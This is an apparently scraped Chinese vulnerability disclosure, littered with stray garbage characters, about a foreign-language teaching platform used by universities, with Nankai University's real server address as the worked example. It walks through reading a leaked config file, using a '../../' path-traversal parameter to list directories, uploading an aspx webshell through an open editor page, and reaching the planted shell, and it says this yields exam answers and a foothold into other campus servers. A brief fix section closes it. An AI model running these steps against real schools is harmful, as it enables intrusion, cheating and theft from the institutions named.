好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中* O5 {* K; B4 X9 z$ Z
8 ?! ~4 o/ F, a
详细说明:! x! Y, M, G8 O- O- t
: K" f! L" c/ P
以南开大学的为例: " V9 w! d5 ^$ Q) j8 \* i+ L6 Z
http://222.30.60.3/NPELS
3 f3 k) b9 R1 U$ LNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址- d: @& P/ C% [
<setting name="Update_CommonSvr_CommonService" serializeAs="String">% r( p, e% o/ G/ D- l
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
! H; h. s" J' {9 @- o</setting>
! B. K! C! L3 X S: v及版本号7 N0 \+ U8 F, p! a
<add key="TVersion" value="1, 0, 0, 2187">
; \, D* ?/ h7 l; [ [; `. O: K+ t; M</add>9 p4 [6 O% ^8 i) y/ ~
直接访问- j; H$ @; g1 O* s3 a
http://222.30.60.3/NPELS/CommonService.asmx5 m: f) }1 f8 p
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
9 r1 b2 `. o9 F- n6 qhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187* l, ^& E0 @; _" e6 S/ e
进一步列目录(返回的网页很大,可以直接 wget 下来)) f, N6 a, `" {0 e" y- q
http://222.30.60.3/NPELS/CommonS ... List?version=../../8 c/ G2 d- } C, P/ k/ l
1 Q7 Z- f8 J6 c V! k- f' l) u `发现# N7 ?$ J* n- Z4 `/ ~
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
' x1 n) |* ?0 J$ ?可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头$ g" F) N# z' \
上传后继续列目录找到木马地址直接访问即可$ o" e$ q) n; ]9 O
5 j" M# ^) p! L3 j yOOXX% @/ o* r( Q: Q
8 M O, V2 a4 NGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
3 o; K( v& S" g' n( D漏洞证明:
9 J7 r7 Y+ \* n' `+ C + ~! F6 P0 _. b1 C: D8 \6 S2 o/ ~
列目录:
0 m, W6 O) S% |9 bhttp://222.30.60.3/NPELS/CommonS ... List?version=../../ h3 N6 y9 J; V( ^8 K: B
文件上传:2 N: ?; K, y/ u( d% i8 T6 g+ o
http://222.30.60.3/npelsv/editor/editor.htm
/ i/ |$ c6 o) ]0 @ # G H( A0 m5 i
上传木马:
" k ^0 ]9 [9 k$ Fhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx* T& R* N) J5 H7 ]8 T |* \$ I
# W/ [5 C% v, s; V$ W: X修复方案:6 ^! u8 O" F( d/ M! y) ?& h
好像考试系统必须使用 CommonService.asmx" n" }" V6 A7 x7 Y0 i( R
最好配置文件加密或者用别的方式不让它泄露出来7 l9 {( D% q6 a5 q" y
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
; ~7 j) O/ D2 a' q8 Y |